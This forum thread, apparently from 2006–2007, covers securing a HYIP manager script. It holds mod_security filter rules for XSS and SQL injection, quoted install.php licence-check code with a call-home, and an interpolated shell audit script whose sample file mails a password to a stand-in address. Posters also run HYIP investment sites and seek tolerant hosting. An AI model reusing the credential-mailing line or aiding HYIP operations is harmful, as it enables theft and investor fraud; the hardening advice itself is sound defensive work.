GC HYIP manager script fixes


HYIPMonitorFree.com Forum - E-currency, HYIPs, autosurf, promotion forum
admin
« on: December 30, 2006, 09:49:55 AM »

There are some HYIP manager Pro script fixes. Check your script to make sure there is no threat in it.  8)
There is a very high risk that there is a backdoor in your script, a threat that allows a hacker to abuse your program and even to get your E-gold account password!

Tutorials on how to remove backdoors from the HYIP manager script:
http://zydusnet.com/forum/viewtopic.php?t=340 - complete, many fixes
http://www.zydusnet.com/forum/viewforum.php?f=6 - Zydusnet forum about HYIP hosting
http://www.etalkmoney.com/moneygeneral/goldcoders-backdoors/ - useful guide
http://www.etalkmoney.com/moneygeneral/goldcoders-hyip-script-more-tips-to-secure-your-hyip/
http://cashmonster.co.uk/forum/index.php?topic=241.0

Local tutorials:
ddd backdoor security.inc - http://www.hyipmonitorfree.com/forum/index.php/topic,64.0.html (remote)

Security rules & recommendations!!!:
- create a ".htaccess" file with the content "deny from all".
Add this file to the inc, tmpl and tmpl_c directories. This will prevent anyone from accessing these folders.
- change file permissions for settings.php to 644 (rw-,r--,r--); if you need to change your program settings from the admin area, just change it back to 666.
- search your script for "@" because there can be some email address to which your e-gold account passphrase or admin login details are sent while making the mass payment or logging in. It is usually in index.php or the /inc/config.inc.php file.
- If you are paying out using HYIP manager's mass payment tool, allow E-gold.com automation only from your server's IP (not from all IPs!).
At first I added my IP into the E-gold.com account sentinel / automation settings and then made a mass payment from my HYIP manager admin area. It did not work and e-gold sent me an automatic message that the automation failed from a certain IP address xxx.xxx.... This IP address is your server's IP address! Just place this IP into your E-gold Account sentinel / Automation access / settings. Allow automation (payments) only from this IP.
- NEVER activate auto-withdrawal even if you host your site on a dedicated server, with no other site located on that server. No server in the world is 100% hacker proof. So, if a hacker finds a work-around to hack the auto-withdrawal, then you will lose money from your egold.
- Do not allow WAP access. Delete the wap.php and goldmoney_processing.php files you do not use.

Add the following code into the ".htaccess" file located in the root directory to prevent SQL injections and similar attacks:
Quote
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"

#Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"


Do you have a dispute or any other security improvements? Please post it!!
If you want a fixed version of the HYIP manager script, PM me.
« Last Edit: April 29, 2007, 07:30:47 AM by admin »

mondros
« Reply #1 on: December 31, 2006, 08:06:58 AM »

That's a very good idea, thank you!
admin
« Reply #2 on: December 31, 2006, 09:59:57 AM »

Yes, I have not yet found any source regarding HYIP script security on the internet, that's why I have decided to create this topic. I will update it from time to time.
If anyone knows any other possible backdoors or vulnerabilities in the HYIP manager Pro script, please post it here and help others! :)
Thanks

digigoods
« Reply #3 on: February 14, 2007, 09:15:27 AM »

Has anyone noticed this string in the Install.php of GC HMPro?
Code:
if (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((($frm_env[HTTP_HOST] == 'goldmillions.com' OR $frm_env[HTTP_HOST] == 'www.goldmillions.com') OR $frm_env[HTTP_HOST] == 'fullhyip.com') OR $frm_env[HTTP_HOST] == 'www.fullhyip.com') OR $frm_env[HTTP_HOST] == 'gopaying.com') OR $frm_env[HTTP_HOST] == 'www.gopaying.com') OR $frm_env[HTTP_HOST] == 'jss-capitalinvest.com') OR $frm_env[HTTP_HOST] == 'www.jss-capitalinvest.com') OR $frm_env[HTTP_HOST] == 'euroyenhyip.com') OR $frm_env[HTTP_HOST] == 'akimirka.net/xxx') OR $frm_env[HTTP_HOST] == 'akimirka.net/xxx') OR $frm_env[HTTP_HOST] == 'www.akimirka.net') OR $frm_env[HTTP_HOST] == 'akimirka.net') OR $frm_env[HTTP_HOST] == 'www.ecurrencyreserve.com') OR $frm_env[HTTP_HOST] == 'beetleinvest.com') OR $frm_env[HTTP_HOST] == 'www.beetleinvest.com') OR $frm_env[HTTP_HOST] == 'carnaby-group.com') OR $frm_env[HTTP_HOST] == 'www.carnaby-group.com') OR $frm_env[HTTP_HOST] == '4wrxinvest.com') OR $frm_env[HTTP_HOST] == 'www.4wrxinvest.com') OR $frm_env[HTTP_HOST] == 'capitalhyip.com') OR $frm_env[HTTP_HOST] == 'www.capitalhyip.com') OR $frm_env[HTTP_HOST] == 'lexus-hyip.com') OR $frm_env[HTTP_HOST] == 'www.lexus-hyip.com') OR $frm_env[HTTP_HOST] == 'gold-private.com') OR $frm_env[HTTP_HOST] == 'www.gold-private.com') OR $frm_env[HTTP_HOST] == 'johnhopperinvestments.com') OR $frm_env[HTTP_HOST] == 'www.johnhopperinvestments.com') OR $frm_env[HTTP_HOST] == 'stable-investment.biz') OR $frm_env[HTTP_HOST] == 'www.stable-investment.biz') OR $frm_env[HTTP_HOST] == 'real-funds.com') OR $frm_env[HTTP_HOST] == 'www.real-funds.com') OR $frm_env[HTTP_HOST] == 'earningmaker.com') OR $frm_env[HTTP_HOST] == 'www.earningmaker.com') OR $frm_env[HTTP_HOST] == 'smarthyip.us') OR $frm_env[HTTP_HOST] == 'www.smarthyip.us') OR $frm_env[HTTP_HOST] == 'ghyip.com') OR $frm_env[HTTP_HOST] == 'www.ghyip.com') OR $frm_env[HTTP_HOST] == 'instabank.net') OR $frm_env[HTTP_HOST] 
== 'www.instabank.net') OR $frm_env[HTTP_HOST] == 'digiwex.com') OR $frm_env[HTTP_HOST] == 'www.digiwex.com') OR $frm_env[HTTP_HOST] == 'e-impek.com') OR $frm_env[HTTP_HOST] == 'www.e-impek.com') OR $frm_env[HTTP_HOST] == 'euro-invest.org') OR $frm_env[HTTP_HOST] == 'www.euro-invest.org') OR $frm_env[HTTP_HOST] == 'bigtradecenter.com') OR $frm_env[HTTP_HOST] == 'www.bigtradecenter.com') OR $frm_env[HTTP_HOST] == 'sierrainvestmentclub.com') OR $frm_env[HTTP_HOST] == 'www.sierrainvestmentclub.com') OR $frm_env[HTTP_HOST] == 'thelasthyip.com') OR $frm_env[HTTP_HOST] == 'www.thelasthyip.com') OR $frm_env[HTTP_HOST] == 'goldenmonth.com') OR $frm_env[HTTP_HOST] == 'www.goldenmonth.com') OR $frm_env[HTTP_HOST] == 'bluestock.biz') OR $frm_env[HTTP_HOST] == 'www.bluestock.biz') OR $frm_env[HTTP_HOST] == 'hyipspark.com') OR $frm_env[HTTP_HOST] == 'www.hyipspark.com') OR $frm_env[HTTP_HOST] == 'rockcohyip.com') OR $frm_env[HTTP_HOST] == 'www.rockcohyip.com') OR $frm_env[HTTP_HOST] == 'themegadeal.com') OR $frm_env[HTTP_HOST] == 'www.themegadeal.com') OR $frm_env[HTTP_HOST] == 'dx-invest.biz') OR $frm_env[HTTP_HOST] == 'www.dx-invest.biz') OR $frm_env[HTTP_HOST] == 'pyramidhyip.com') OR $frm_env[HTTP_HOST] == 'www.pyramidhyip.com') OR $frm_env[HTTP_HOST] == 'hyip-experience.com') OR $frm_env[HTTP_HOST] == 'www.hyip-experience.com') OR $frm_env[HTTP_HOST] == 'globalforexinvest.com') OR $frm_env[HTTP_HOST] == 'www.globalforexinvest.com') OR $frm_env[HTTP_HOST] == 'hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.hyipforever.biz') OR $frm_env[HTTP_HOST] == 'max-hyip.com') OR $frm_env[HTTP_HOST] == 'www.max-hyip.com') OR $frm_env[HTTP_HOST] == 'investdream.com') OR $frm_env[HTTP_HOST] == 'www.investdream.com') OR $frm_env[HTTP_HOST] == 'invest-network.net') OR $frm_env[HTTP_HOST] == 'www.invest-network.net') OR $frm_env[HTTP_HOST] == 'easywayhyip.com') OR $frm_env[HTTP_HOST] == 'www.easywayhyip.com') OR $frm_env[HTTP_HOST] == 'sime-groups.net') OR $frm_env[HTTP_HOST] == 
'www.sime-groups.net') OR $frm_env[HTTP_HOST] == 'privateforex.com') OR $frm_env[HTTP_HOST] == 'www.privateforex.com') OR $frm_env[HTTP_HOST] == 'easilyinvest.com') OR $frm_env[HTTP_HOST] == 'www.easilyinvest.com') OR $frm_env[HTTP_HOST] == 'hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.andyegold.com') OR $frm_env[HTTP_HOST] == 'andyegold.com') OR $frm_env[HTTP_HOST] == 'worldtrustinv.com') OR $frm_env[HTTP_HOST] == 'www.worldtrustinv.com') OR $frm_env[HTTP_HOST] == 'www.hyipfunds.com') OR $frm_env[HTTP_HOST] == 'hyipfunds.com') OR $frm_env[HTTP_HOST] == 'victoryhyip.com') OR $frm_env[HTTP_HOST] == 'www.victoryhyip.com') OR $frm_env[HTTP_HOST] == 'fx-wizards.com') OR $frm_env[HTTP_HOST] == 'www.fx-wizards.com') OR $frm_env[HTTP_HOST] == 'hyi-p.com') OR $frm_env[HTTP_HOST] == 'www.hyi-p.com') OR $frm_env[HTTP_HOST] == 'hyiptreasures.com') OR $frm_env[HTTP_HOST] == 'www.hyiptreasures.com') OR $frm_env[HTTP_HOST] == 'honesthyip.com') OR $frm_env[HTTP_HOST] == 'www.honesthyip.com') OR $frm_env[HTTP_HOST] == 'sapphirehyip.com') OR $frm_env[HTTP_HOST] == 'www.sapphirehyip.com') OR $frm_env[HTTP_HOST] == 'quallityhyip.com') OR $frm_env[HTTP_HOST] == 'www.quallityhyip.com') OR $frm_env[HTTP_HOST] == 'www.goldcoders.com') OR $frm_env[HTTP_HOST] == 'moviemakersfinance.com') OR $frm_env[HTTP_HOST] == 'www.moviemakersfinance.com') OR $frm_env[HTTP_HOST] == 'automatic-hyip.com') OR $frm_env[HTTP_HOST] == 'www.automatic-hyip.com') OR $frm_env[HTTP_HOST] == 'chiligold.com') OR $frm_env[HTTP_HOST] == 'www.chiligold.com') OR $frm_env[HTTP_HOST] == 'ezoneinvest.com') OR $frm_env[HTTP_HOST] == 'www.ezoneinvest.com') OR $frm_env[HTTP_HOST] == 'hyipfunds.com') OR $frm_env[HTTP_HOST] == 'www.hyipfunds.com') OR $frm_env[HTTP_HOST] == 'profitbygold.com') OR $frm_env[HTTP_HOST] == 'www.profitbygold.com') OR $frm_env[HTTP_HOST] == 'quick-income.com') OR $frm_env[HTTP_HOST] == 'www.quick-income.com') OR $frm_env[HTTP_HOST] == 
'dutchservice.com') OR $frm_env[HTTP_HOST] == 'www.dutchservice.com') OR $frm_env[HTTP_HOST] == 'shortinvest.com') OR $frm_env[HTTP_HOST] == 'www.shortinvest.com') OR $frm_env[HTTP_HOST] == 'mind-hyip.com') OR $frm_env[HTTP_HOST] == 'www.mind-hyip.com') OR ($frm_env[HTTP_HOST] == 'www.ltinvest.com' OR $frm_env[HTTP_HOST] == 'ltinvest.com')))
    {
    }
    else
    {
      $str = send_string_to_gold_coders_install ();
      if ($str != md5 ('ok' . $frm_env['HTTP_HOST'] . 'zzzifdsljfdkljfs'))
      {
        $smarty->assign ('wrong_license', 0);
        $ok = 1;
      }
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx/' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'ezoneinvest.com' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'www.ezoneinvest.com' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'hyipfunds.com' AND $ok == 0))


I'm working on cleaning and add-ons. Please add me on MSN Messenger: digigoods@hotmail.com
admin
« Reply #4 on: February 19, 2007, 04:02:56 AM »

This string should be removed. I think that you can't install your script without having your domain name typed in this file or registered at Goldcoders. If you want to have the fixed install.php file, PM me.

carlangas2000
« Reply #5 on: March 28, 2007, 04:56:55 AM »

Hello admin. Can you send me a clean install.php file? Thanks for your work.
admin
« Reply #6 on: March 28, 2007, 09:13:35 AM »

> Hello admin. Can you send me a clean install.php file? Thanks for your work.
Email sent.

carlangas2000
« Reply #7 on: March 28, 2007, 09:59:32 AM »

Thank you admin!!! Only one question: when I try to install, I open install.php, but nothing appears. I cleaned the backdoors, and now nothing appears when I try to install. Please, if someone has a script of GC or another HYIP/autosurf (I prefer autosurf), please send me a PM or send it directly to nowgold2@hotmail.com. Thanks.
carlangas2000
« Reply #8 on: March 29, 2007, 02:34:35 AM »

Hello admin:

I read the message that you sent me yesterday. My question is whether you have a clean rollersoft script (autosurf) or another autosurf, because I prefer an autosurf over a HYIP.

Is the script that you offer me really clean and working? I am scared that the script will not work for me and I will lose the money.

Thanks for your time.

Did the PM that I sent you arrive fine? I think that the PM I sent you did not arrive.
admin
« Reply #9 on: March 29, 2007, 10:10:15 AM »

I have PMed you. I'm sorry for the delay.

Alex
« Reply #10 on: March 30, 2007, 06:33:44 AM »

Hello admin ,
Thank you for the very useful information. Nobody on the internet has written about it.
Could you please suggest what script I should use to create my own HYIP? I don't know programming at all. I just need a script without trojans, backdoors, etc. Please suggest a free or paid version of such scripts.

Thank you
alex
admin
« Reply #11 on: March 30, 2007, 02:06:02 PM »

I can sell you the script I have fixed. PMed you.

confused
« Reply #12 on: April 05, 2007, 06:40:13 PM »

Hello admin, do you have a secure latest copy of GC HYIP Manager Pro with all trojans, backdoors, SQL injection etc. closed?

I checked everywhere and most of them are bugged. Please help if possible.
Peter
« Reply #13 on: May 13, 2007, 01:08:50 PM »

Hello Admin,

Really a good topic. Thanks for all. Please check your PM.

regards
peter
admin
« Reply #14 on: May 13, 2007, 01:33:16 PM »

> Hello Admin,
>
> Really a good topic. Thanks for all. Please check your PM.
>
> regards
> peter
Thank you. If you or anyone else found any other important fixes or have a security recommendation, please post it.

prodix
« Reply #15 on: May 26, 2007, 05:41:15 AM »

I have bought a GC HYIP script Pro... but I found a lot of problems, like security settings, e-gold alternate passphrase and others. Sometimes it's hard to login to the admin area and the auto notification e-mail does not work... hm... admin, can I buy a very clean and 100% hackproof one from you?? Thanks...
gloria
« Reply #16 on: June 04, 2007, 07:26:53 PM »

> Thank you. If you or anyone else found any other important fixes or have a security recommendation, please post it.
Hi admin - Great info, thanks! I've managed several HYIPs but most of them were hacked. Just wanted to say that:
- In addition to deleting the wap.php and goldmoney_processing.php files, you should delete the e-bullion_processing.php file (if you don't use it) as it enables a hacker to add fake bonuses to his account.
- Some of the other *_processing.php files need to be renamed for security reasons (you can see them on the Settings page of the admin area).
- You should always enable the alternate password in the admin area.
Now I have a question! Can you let me know a good hosting company that approves a HYIP site to be hosted on it without problem?
Thanks for your time - Gloria
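As an added example (not code from this thread or from the HYIP Manager script itself), a small POSIX shell audit that checks an installed script tree for the items the first post and Gloria's reply above list: e-mail addresses embedded in PHP source, the install.php HTTP_HOST chain, the deny-all .htaccess files in inc/tmpl/tmpl_c, settings.php permissions, and leftover wap/processing handlers. The directory and file names are taken from the thread; the sample tree it builds is constructed purely for the demonstration.

```shell
#!/bin/sh
# Added example (not the forum's or the HYIP Manager script's own code): a read-only
# audit of a HYIP Manager style tree for the issues the thread lists. The names
# (inc, tmpl, tmpl_c, settings.php, install.php, wap.php) come from the thread.
# 1. E-mail addresses in PHP source: the post says to search for "@" because a
#    backdoor mails the e-gold passphrase or admin login to a hardcoded address.
count_embedded_emails() {
  find "$1" -name '*.php' -exec grep -Eo \
    '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' {} + | wc -l | tr -d ' '
}
# 2. install.php licence check (digigoods' post): count the hardcoded HTTP_HOST
#    comparisons; 0 means the chain has been removed.
count_hardcoded_hosts() {
  [ -f "$1/install.php" ] || { echo 0; return 0; }
  grep -oF "HTTP_HOST] == '" "$1/install.php" | wc -l | tr -d ' '
}
# 3. inc, tmpl and tmpl_c must each carry a .htaccess with "deny from all";
#    prints the directories that do not.
missing_deny_all() {
  for d in inc tmpl tmpl_c; do
    f="$1/$d/.htaccess"
    if [ ! -f "$f" ] || ! grep -qi '^deny from all' "$f"; then printf '%s\n' "$d"; fi
  done
}
# 4. settings.php should be 644 except while editing from the admin area;
#    prints "yes" when it is world-writable (666).
settings_world_writable() {
  if [ -n "$(find "$1/settings.php" -perm -002 2>/dev/null)" ]; then echo yes; else echo no; fi
}
# 5. Handlers the thread says to delete or rename when unused (wap.php, the
#    goldmoney and e-bullion processing files); prints the ones still present.
leftover_handlers() {
  for f in wap.php goldmoney_processing.php e-bullion_processing.php; do
    if [ -f "$1/$f" ]; then printf '%s\n' "$f"; fi
  done
}
# Constructed sample tree (not a real installation) so the audit runs offline.
make_sample_tree() {
  t=$(mktemp -d); mkdir -p "$t/inc" "$t/tmpl" "$t/tmpl_c"
  printf 'deny from all\n' > "$t/inc/.htaccess"      # correct
  printf 'Options -Indexes\n' > "$t/tmpl/.htaccess"  # wrong directive; tmpl_c has none
  printf '<?php\n$admin_mail = "owner@example.com";\n' > "$t/inc/config.inc.php"
  printf '<?php\nmail("hidden@example.net", "login", $pass);\n' > "$t/index.php"
  printf "<?php\nif ((\$frm_env[HTTP_HOST] == 'a.example' OR \$frm_env[HTTP_HOST] == 'www.a.example')\
 OR \$frm_env[HTTP_HOST] == 'b.example') { } else { \$str = send_string_to_gold_coders_install (); }\n" > "$t/install.php"
  printf '<?php\n' > "$t/settings.php"; chmod 666 "$t/settings.php"
  printf '<?php\n' > "$t/wap.php"
  printf '%s\n' "$t"
}
# Report on the constructed tree
SAMPLE=$(make_sample_tree)
printf 'emails=%s hosts=%s no_deny_all=[%s] settings_666=%s leftover=[%s]\n' \
  "$(count_embedded_emails "$SAMPLE")" "$(count_hardcoded_hosts "$SAMPLE")" \
  "$(missing_deny_all "$SAMPLE" | xargs)" "$(settings_world_writable "$SAMPLE")" "$(leftover_handlers "$SAMPLE" | xargs)"
rm -rf "$SAMPLE"
```

Point the functions at a real script root instead of the sample tree to audit an installation; every check only reads files, so it is safe to run on a live site.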
gloria
« Reply #17 on: June 04, 2007, 07:33:06 PM »


> - create a ".htaccess" file with the content "deny from all".
Dear admin, do you mean to change the permission of the ".htaccess"? Can you explain more?
Thanks for your time - Gloria
admin
« Reply #18 on: June 05, 2007, 06:48:10 AM »

Thank you for the recommendations Gloria! I agree that enabling the alternate passphrase in the admin area is necessary.
Regarding hosting website, try http://offshorehost.biz/
- .htaccess file with "deny from all" will ensure that files in that directory can't be accessed.

atr7
« Reply #19 on: July 11, 2007, 12:49:41 AM »

Hi, newbie here...
I am interested to get a HYIP script at http://www.hyip-script.info/...
The issue that worries me is that the price is so cheap that I don't know if it is true.
Anyone ever purchase their script before?

Thanks.